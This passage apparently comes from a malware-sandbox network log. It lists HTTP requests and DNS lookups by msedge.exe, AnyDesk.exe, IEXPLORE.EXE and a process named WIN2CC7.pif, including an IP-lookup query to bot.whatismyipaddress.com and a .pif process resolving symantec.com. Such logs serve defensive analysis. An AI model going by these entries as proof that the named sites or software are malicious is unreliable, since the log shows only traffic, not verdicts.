DNT: 1
Accept: text/css,*/*;q=0.1
Referer: http://freedesktopsoft.com/butterflyondesktoplike.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Sat, 05 Oct 2024 16:13:14 GMT
Server: Apache
Upgrade: h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Tue, 09 Apr 2019 09:50:56 GMT
ETag: "1999-58615e3ba8951"
Accept-Ranges: bytes
Content-Length: 6553
Keep-Alive: timeout=15, max=100
Content-Type: text/css
GET

http://freedesktopsoft.com/images/menubackgroundside2.jpg

msedge.exe

Remote address:

78.46.117.95:80

Request

GET /images/menubackgroundside2.jpg HTTP/1.1
Host: freedesktopsoft.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
DNT: 1
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://freedesktopsoft.com/butterflyondesktoplike.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Sat, 05 Oct 2024 16:13:14 GMT
Server: Apache
Last-Modified: Tue, 09 Apr 2019 09:50:49 GMT
ETag: "568-58615e34f8b6f"
Accept-Ranges: bytes
Content-Length: 1384
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Content-Type: image/jpeg
GET

http://freedesktopsoft.com/button.css

msedge.exe

Remote address:

78.46.117.95:80

Request

GET /button.css HTTP/1.1
Host: freedesktopsoft.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
DNT: 1
Accept: text/css,*/*;q=0.1
Referer: http://freedesktopsoft.com/butterflyondesktoplike.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Sat, 05 Oct 2024 16:13:14 GMT
Server: Apache
Upgrade: h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Tue, 09 Apr 2019 09:50:16 GMT
ETag: "adc-58615e155e1d6"
Accept-Ranges: bytes
Content-Length: 2780
Keep-Alive: timeout=15, max=100
Content-Type: text/css
GET

http://freedesktopsoft.com/images/bodybackground.png

msedge.exe

Remote address:

78.46.117.95:80

Request

GET /images/bodybackground.png HTTP/1.1
Host: freedesktopsoft.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
DNT: 1
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://freedesktopsoft.com/main.css
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Sat, 05 Oct 2024 16:13:14 GMT
Server: Apache
Last-Modified: Tue, 09 Apr 2019 09:50:46 GMT
ETag: "2e95-58615e31f7345"
Accept-Ranges: bytes
Content-Length: 11925
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Content-Type: image/png
GET

http://freedesktopsoft.com/slider/slider.js

msedge.exe

Remote address:

78.46.117.95:80

Request

GET /slider/slider.js HTTP/1.1
Host: freedesktopsoft.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
DNT: 1
Accept: */*
Referer: http://freedesktopsoft.com/butterflyondesktoplike.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Sat, 05 Oct 2024 16:13:14 GMT
Server: Apache
Upgrade: h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Tue, 09 Apr 2019 09:50:56 GMT
ETag: "bfc-58615e3bad770"
Accept-Ranges: bytes
Content-Length: 3068
Keep-Alive: timeout=15, max=100
Content-Type: application/javascript
GET

http://freedesktopsoft.com/images/superman_likeus.gif

msedge.exe

Remote address:

78.46.117.95:80

Request

GET /images/superman_likeus.gif HTTP/1.1
Host: freedesktopsoft.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
DNT: 1
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://freedesktopsoft.com/butterflyondesktoplike.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Sat, 05 Oct 2024 16:13:14 GMT
Server: Apache
Last-Modified: Tue, 09 Apr 2019 09:50:50 GMT
ETag: "7b5f-58615e3597e3e"
Accept-Ranges: bytes
Content-Length: 31583
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Content-Type: image/gif
GET

http://freedesktopsoft.com/images/banner3.jpg

msedge.exe

Remote address:

78.46.117.95:80

Request

GET /images/banner3.jpg HTTP/1.1
Host: freedesktopsoft.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
DNT: 1
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://freedesktopsoft.com/butterflyondesktoplike.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Sat, 05 Oct 2024 16:13:14 GMT
Server: Apache
Upgrade: h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Tue, 09 Apr 2019 09:50:45 GMT
ETag: "a57e-58615e3163bf6"
Accept-Ranges: bytes
Content-Length: 42366
Keep-Alive: timeout=15, max=100
Content-Type: image/jpeg
DNS

connect.facebook.net

msedge.exe

Remote address:

8.8.8.8:53

Request

connect.facebook.net

IN A

Response

connect.facebook.net

IN CNAME

scontent.xx.fbcdn.net

scontent.xx.fbcdn.net

IN A

163.70.151.21
DNS

connect.facebook.net

msedge.exe

Remote address:

8.8.8.8:53

Request

connect.facebook.net

IN A
GET

http://connect.facebook.net/en_US/all.js

msedge.exe

Remote address:

163.70.151.21:80

Request

GET /en_US/all.js HTTP/1.1
Host: connect.facebook.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
DNT: 1
Accept: */*
Referer: http://freedesktopsoft.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 301 Moved Permanently

Location: https://connect.facebook.net/en_US/all.js
Content-Type: text/plain
Server: proxygen-bolt
Date: Sat, 05 Oct 2024 16:13:15 GMT
Connection: keep-alive
Content-Length: 0
GET

http://www.google-analytics.com/ga.js

msedge.exe

Remote address:

172.217.169.14:80

Request

GET /ga.js HTTP/1.1
Host: www.google-analytics.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
DNT: 1
Accept: */*
Referer: http://freedesktopsoft.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Cross-Origin-Resource-Policy: cross-origin
Server: Golfe2
Content-Length: 17168
Content-Security-Policy-Report-Only: script-src 'none'; form-action 'none'; frame-src 'none'; report-uri https://csp.withgoogle.com/csp/scaffolding/ascnsrsgac:215:0
Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to=coop_reporting
Report-To: {"group":"coop_reporting","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/scaffolding/ascnsrsgac:215:0"}],}
Date: Sat, 05 Oct 2024 14:50:21 GMT
Expires: Sat, 05 Oct 2024 16:50:21 GMT
Cache-Control: public, max-age=7200
Age: 4974
Last-Modified: Tue, 12 Dec 2023 18:09:08 GMT
Content-Type: text/javascript
Vary: Accept-Encoding
GET

http://www.google-analytics.com/r/__utm.gif?utmwv=5.7.2&utms=1&utmn=2142639942&utmhn=freedesktopsoft.com&utmcs=UTF-8&utmsr=1280x720&utmvp=1017x572&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=-&utmdt=Butterfly%20On%20Desktop%20-%20Freeware%20software&utmhid=128639635&utmr=-&utmp=%2Fbutterflyondesktoplike.html&utmht=1728144794756&utmac=UA-39364152-1&utmcc=__utma%3D49514865.881488121.1728144795.1728144795.1728144795.1%3B%2B__utmz%3D49514865.1728144795.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&utmjid=1531739093&utmredir=1&utmu=qBAAAAAAAAAAAAAAAAAAAAAE~

msedge.exe

Remote address:

172.217.169.14:80

Request

GET /r/__utm.gif?utmwv=5.7.2&utms=1&utmn=2142639942&utmhn=freedesktopsoft.com&utmcs=UTF-8&utmsr=1280x720&utmvp=1017x572&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=-&utmdt=Butterfly%20On%20Desktop%20-%20Freeware%20software&utmhid=128639635&utmr=-&utmp=%2Fbutterflyondesktoplike.html&utmht=1728144794756&utmac=UA-39364152-1&utmcc=__utma%3D49514865.881488121.1728144795.1728144795.1728144795.1%3B%2B__utmz%3D49514865.1728144795.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&utmjid=1531739093&utmredir=1&utmu=qBAAAAAAAAAAAAAAAAAAAAAE~ HTTP/1.1
Host: www.google-analytics.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
DNT: 1
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://freedesktopsoft.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:13:15 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Last-Modified: Sun, 17 May 1998 03:00:00 GMT
X-Content-Type-Options: nosniff
Content-Type: image/gif
Cross-Origin-Resource-Policy: cross-origin
Content-Security-Policy-Report-Only: script-src 'none'; form-action 'none'; frame-src 'none'; report-uri https://csp.withgoogle.com/csp/scaffolding/ascnsrsgac:169:0
Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to=coop_reporting
Report-To: {"group":"coop_reporting","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/scaffolding/ascnsrsgac:169:0"}],}
Server: Golfe2
Content-Length: 35
DNS

2.180.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

2.180.250.142.in-addr.arpa

IN PTR

Response

2.180.250.142.in-addr.arpa

IN PTR

lhr25s32-in-f21e100net
DNS

2.180.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

2.180.250.142.in-addr.arpa

IN PTR

Response

2.180.250.142.in-addr.arpa

IN PTR

lhr25s32-in-f21e100net
DNS

21.151.70.163.in-addr.arpa

Remote address:

8.8.8.8:53

Request

21.151.70.163.in-addr.arpa

IN PTR

Response

21.151.70.163.in-addr.arpa

IN PTR

xx-fbcdn-shv-02-lhr6fbcdnnet
DNS

21.151.70.163.in-addr.arpa

Remote address:

8.8.8.8:53

Request

21.151.70.163.in-addr.arpa

IN PTR
DNS

googleads.g.doubleclick.net

msedge.exe

Remote address:

8.8.8.8:53

Request

googleads.g.doubleclick.net

IN A

Response

googleads.g.doubleclick.net

IN A

142.250.187.194
DNS

googleads.g.doubleclick.net

msedge.exe

Remote address:

8.8.8.8:53

Request

googleads.g.doubleclick.net

IN A

Response

googleads.g.doubleclick.net

IN A

142.250.187.194
DNS

fundingchoicesmessages.google.com

msedge.exe

Remote address:

8.8.8.8:53

Request

fundingchoicesmessages.google.com

IN A

Response

fundingchoicesmessages.google.com

IN CNAME

www3.l.google.com

www3.l.google.com

IN A

142.250.187.238
DNS

fundingchoicesmessages.google.com

msedge.exe

Remote address:

8.8.8.8:53

Request

fundingchoicesmessages.google.com

IN A
DNS

fundingchoicesmessages.google.com

msedge.exe

Remote address:

8.8.8.8:53

Request

fundingchoicesmessages.google.com

IN A
DNS

fundingchoicesmessages.google.com

msedge.exe

Remote address:

8.8.8.8:53

Request

fundingchoicesmessages.google.com

IN A
DNS

fundingchoicesmessages.google.com

msedge.exe

Remote address:

8.8.8.8:53

Request

fundingchoicesmessages.google.com

IN A
DNS

194.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

194.187.250.142.in-addr.arpa

IN PTR

Response

194.187.250.142.in-addr.arpa

IN PTR

lhr25s33-in-f21e100net
DNS

bot.whatismyipaddress.com

AnyDesk.exe

Remote address:

8.8.8.8:53

Request

bot.whatismyipaddress.com

IN A

Response
DNS

bot.whatismyipaddress.com

AnyDesk.exe

Remote address:

8.8.8.8:53

Request

bot.whatismyipaddress.com

IN A

Response
DNS

238.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

238.187.250.142.in-addr.arpa

IN PTR

Response

238.187.250.142.in-addr.arpa

IN PTR

lhr25s34-in-f141e100net
DNS

238.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

238.187.250.142.in-addr.arpa

IN PTR
DNS

168.168.165.95.in-addr.arpa

Remote address:

8.8.8.8:53

Request

168.168.165.95.in-addr.arpa

IN PTR

Response

168.168.165.95.in-addr.arpa

IN PTR

95-165-168-168staticspd-mgtsru�
DNS

168.168.165.95.in-addr.arpa

Remote address:

8.8.8.8:53

Request

168.168.165.95.in-addr.arpa

IN PTR

Response

168.168.165.95.in-addr.arpa

IN PTR

95-165-168-168staticspd-mgtsru�
DNS

81.211.222.158.in-addr.arpa

Remote address:

8.8.8.8:53

Request

81.211.222.158.in-addr.arpa

IN PTR

Response

81.211.222.158.in-addr.arpa

IN PTR

syn-158-222-211-081resspectrumcom
DNS

81.211.222.158.in-addr.arpa

Remote address:

8.8.8.8:53

Request

81.211.222.158.in-addr.arpa

IN PTR

Response

81.211.222.158.in-addr.arpa

IN PTR

syn-158-222-211-081resspectrumcom
DNS

www.veryicon.com

IEXPLORE.EXE

Remote address:

8.8.8.8:53

Request

www.veryicon.com

IN A

Response

www.veryicon.com

IN A

104.21.11.28

www.veryicon.com

IN A

172.67.165.22
DNS

www.veryicon.com

IEXPLORE.EXE

Remote address:

8.8.8.8:53

Request

www.veryicon.com

IN A

Response

www.veryicon.com

IN A

104.21.11.28

www.veryicon.com

IN A

172.67.165.22
GET

http://fonts.googleapis.com/css?family=Audiowide

IEXPLORE.EXE

Remote address:

142.250.187.202:80

Request

GET /css?family=Audiowide HTTP/1.1
Accept: text/css, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: fonts.googleapis.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Content-Type: text/css; charset=utf-8
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
Expires: Sat, 05 Oct 2024 16:14:08 GMT
Date: Sat, 05 Oct 2024 16:14:08 GMT
Cache-Control: private, max-age=86400
Cross-Origin-Opener-Policy: same-origin-allow-popups
Cross-Origin-Resource-Policy: cross-origin
Content-Encoding: gzip
Transfer-Encoding: chunked
Server: ESF
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
GET

http://www.veryicon.com/icon/png/Flag/Flag%204/Germany.png

IEXPLORE.EXE

Remote address:

104.21.11.28:80

Request

GET /icon/png/Flag/Flag%204/Germany.png HTTP/1.1
Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: www.veryicon.com
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Date: Sat, 05 Oct 2024 16:14:08 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Sat, 05 Oct 2024 17:14:08 GMT
Location: https://www.veryicon.com/icon/png/Flag/Flag%204/Germany.png
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jBJSKAJM%2BXkI%2FSH51MAlnYU8mb4ejnsphJur3wSBx1s3%2F52bPgr8zcKH4%2B%2FQa7vWXUJgXHegSY4Q26wTBzy5XzCr%2BgLo45UHu4AZ5QIa9Kb0uf0YJ1gwP9nqFvslsrriznEp"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Speculation-Rules: "/cdn-cgi/speculation"
Server: cloudflare
CF-RAY: 8cdeb3f8787c0e3c-AMS
GET

http://www.veryicon.com/icon/png/Flag/Flag%204/United%20Kingdom.png

IEXPLORE.EXE

Remote address:

104.21.11.28:80

Request

GET /icon/png/Flag/Flag%204/United%20Kingdom.png HTTP/1.1
Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: www.veryicon.com
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Date: Sat, 05 Oct 2024 16:14:08 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Sat, 05 Oct 2024 17:14:08 GMT
Location: https://www.veryicon.com/icon/png/Flag/Flag%204/United%20Kingdom.png
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JatrkQEI4Kzb3RXhOXmRU3CrGXQq8G4KEWJOWu7Y%2FexC4pUIG%2B7lee6bEgNDLvq7z86mjHjipFc8PGFppPg%2BTr9bwE5dUC8Cd3bd9hJxVccIvSpgoKf2VMjNq0GbJU8pFlyZ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Speculation-Rules: "/cdn-cgi/speculation"
Server: cloudflare
CF-RAY: 8cdeb3f81f55b8df-AMS
GET

https://www.veryicon.com/icon/png/Flag/Flag%204/United%20Kingdom.png

IEXPLORE.EXE

Remote address:

104.21.11.28:443

Request

GET /icon/png/Flag/Flag%204/United%20Kingdom.png HTTP/2.0
host: www.veryicon.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
accept-encoding: gzip, deflate

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:14:09 GMT
content-type: image/png
content-length: 3739
last-modified: Tue, 16 Apr 2019 12:40:36 GMT
etag: "1d4f45196caf49b"
cf-cache-status: MISS
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SIxxUfIooLF3UACp4MriWeRF9ucbwkc7XiBVB44q25PFtfEf4ui2A0pIlLBcyDxjZvn4F7vniFHw4AatMh0gVMICYO3Xr4KLEow%2BOsaB%2B%2FLymFI9zoO0xF0SihJ7q3MY1B48"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
strict-transport-security: max-age=15552000; includeSubDomains; preload
x-content-type-options: nosniff
server: cloudflare
cf-ray: 8cdeb3fcde140a53-AMS
GET

https://www.veryicon.com/icon/png/Flag/Flag%204/Germany.png

IEXPLORE.EXE

Remote address:

104.21.11.28:443

Request

GET /icon/png/Flag/Flag%204/Germany.png HTTP/2.0
host: www.veryicon.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
accept-encoding: gzip, deflate

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:14:09 GMT
content-type: image/png
content-length: 1340
last-modified: Tue, 16 Apr 2019 12:40:37 GMT
etag: "1d4f451976395bc"
cf-cache-status: MISS
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2DtmMRXgMzLUncjtWpC5%2BpkDHr8ZH04itJwmk%2FaWUqOgzy2R%2Fi4fAsDQK8R8Pyxq6LHsW4SdNF5ZiNPo%2FfLvYOrNdRdZ9yM07%2FTpJQQJMq%2Bibyptat%2FTqsI7Md9h%2FcpSaR9P"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
strict-transport-security: max-age=15552000; includeSubDomains; preload
x-content-type-options: nosniff
server: cloudflare
cf-ray: 8cdeb3fcde190a53-AMS
DNS

c.pki.goog

IEXPLORE.EXE

Remote address:

8.8.8.8:53

Request

c.pki.goog

IN A

Response

c.pki.goog

IN CNAME

pki-goog.l.google.com

pki-goog.l.google.com

IN A

142.250.200.35
DNS

c.pki.goog

IEXPLORE.EXE

Remote address:

8.8.8.8:53

Request

c.pki.goog

IN A

Response

c.pki.goog

IN CNAME

pki-goog.l.google.com

pki-goog.l.google.com

IN A

172.217.169.3
GET

http://c.pki.goog/r/gsr1.crl

IEXPLORE.EXE

Remote address:

142.250.200.35:80

Request

GET /r/gsr1.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: c.pki.goog

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
Content-Length: 1739
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Sat, 05 Oct 2024 16:03:22 GMT
Expires: Sat, 05 Oct 2024 16:53:22 GMT
Cache-Control: public, max-age=3000
Age: 647
Last-Modified: Mon, 08 Jul 2024 07:38:00 GMT
Content-Type: application/pkix-crl
Vary: Accept-Encoding
GET

http://c.pki.goog/r/r4.crl

IEXPLORE.EXE

Remote address:

142.250.200.35:80

Request

GET /r/r4.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: c.pki.goog

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
Content-Length: 436
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Sat, 05 Oct 2024 16:03:24 GMT
Expires: Sat, 05 Oct 2024 16:53:24 GMT
Cache-Control: public, max-age=3000
Age: 645
Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
Content-Type: application/pkix-crl
Vary: Accept-Encoding
DNS

i.imgur.com

IEXPLORE.EXE

Remote address:

8.8.8.8:53

Request

i.imgur.com

IN A

Response

i.imgur.com

IN CNAME

ipv4.imgur.map.fastly.net

ipv4.imgur.map.fastly.net

IN A

199.232.192.193

ipv4.imgur.map.fastly.net

IN A

199.232.196.193
DNS

i.imgur.com

IEXPLORE.EXE

Remote address:

8.8.8.8:53

Request

i.imgur.com

IN A

Response

i.imgur.com

IN CNAME

ipv4.imgur.map.fastly.net

ipv4.imgur.map.fastly.net

IN A

199.232.196.193

ipv4.imgur.map.fastly.net

IN A

199.232.192.193
GET

http://i.imgur.com/zHNCk2e.gif

IEXPLORE.EXE

Remote address:

199.232.192.193:80

Request

GET /zHNCk2e.gif HTTP/1.1
Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: i.imgur.com
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Connection: close
Content-Length: 0
Retry-After: 0
Location: https://i.imgur.com/zHNCk2e.gif
Accept-Ranges: bytes
Date: Sat, 05 Oct 2024 16:14:09 GMT
X-Served-By: cache-ams2100127-AMS
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1728144849.427076,VS0,VE0
Strict-Transport-Security: max-age=300
Access-Control-Allow-Methods: GET, OPTIONS
Access-Control-Allow-Origin: *
Server: cat factory 1.0
GET

http://fonts.gstatic.com/s/audiowide/v20/l7gdbjpo0cum0ckerWCdlg_I.woff

IEXPLORE.EXE

Remote address:

142.250.179.227:80

Request

GET /s/audiowide/v20/l7gdbjpo0cum0ckerWCdlg_I.woff HTTP/1.1
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Origin: file:
Accept-Encoding: gzip, deflate
Host: fonts.gstatic.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Content-Type: font/woff
Access-Control-Allow-Origin: *
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="apps-themes"
Report-To: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
Timing-Allow-Origin: *
Content-Length: 17832
Date: Sat, 05 Oct 2024 16:14:09 GMT
Expires: Sun, 05 Oct 2025 16:14:09 GMT
Cache-Control: public, max-age=31536000
Last-Modified: Thu, 24 Aug 2023 20:44:07 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
GET

https://i.imgur.com/zHNCk2e.gif

IEXPLORE.EXE

Remote address:

199.232.192.193:443

Request

GET /zHNCk2e.gif HTTP/2.0
host: i.imgur.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
accept-encoding: gzip, deflate

Response

HTTP/2.0 200

content-type: image/gif
last-modified: Sat, 19 Oct 2013 15:05:36 GMT
etag: "071b5a717594fd473a331a24ccf83e3e"
x-amz-cf-pop: IAD89-P1
x-amz-cf-id: l1gmFJnSczY6ToFU2NOjz45bYng7ku3xF_7AHnSg5-3vvZVcX3eupw==
cache-control: public, max-age=31536000
accept-ranges: bytes
age: 2158477
date: Sat, 05 Oct 2024 16:14:10 GMT
x-served-by: cache-iad-kiad7000031-IAD, cache-ams2100114-AMS
x-cache: Miss from cloudfront, HIT, MISS
x-cache-hits: 38, 0
x-timer: S1728144850.299107,VS0,VE94
strict-transport-security: max-age=300
access-control-allow-methods: GET, OPTIONS
access-control-allow-origin: *
server: cat factory 1.0
x-content-type-options: nosniff
content-length: 1555
DNS

202.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

202.187.250.142.in-addr.arpa

IN PTR

Response

202.187.250.142.in-addr.arpa

IN PTR

lhr25s33-in-f101e100net
DNS

202.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

202.187.250.142.in-addr.arpa

IN PTR
DNS

28.11.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

28.11.21.104.in-addr.arpa

IN PTR

Response
DNS

28.11.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

28.11.21.104.in-addr.arpa

IN PTR

Response
DNS

193.192.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

193.192.232.199.in-addr.arpa

IN PTR

Response
DNS

193.192.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

193.192.232.199.in-addr.arpa

IN PTR

Response
DNS

233.38.18.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

233.38.18.104.in-addr.arpa

IN PTR

Response
DNS

233.38.18.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

233.38.18.104.in-addr.arpa

IN PTR

Response
DNS

www.symantec.com

WIN2CC7.pif

Remote address:

8.8.8.8:53

Request

www.symantec.com

IN A

Response

www.symantec.com

IN CNAME

cdn.broadcom.com

cdn.broadcom.com

IN CNAME

www.broadcom.com.cdn.cloudflare.net

www.broadcom.com.cdn.cloudflare.net

IN A

104.18.37.111

www.broadcom.com.cdn.cloudflare.net

IN A

172.64.150.145
DNS

www.symantec.com

WIN2CC7.pif

Remote address:

8.8.8.8:53

Request

www.symantec.com

IN A

Response

www.symantec.com

IN CNAME

cdn.broadcom.com

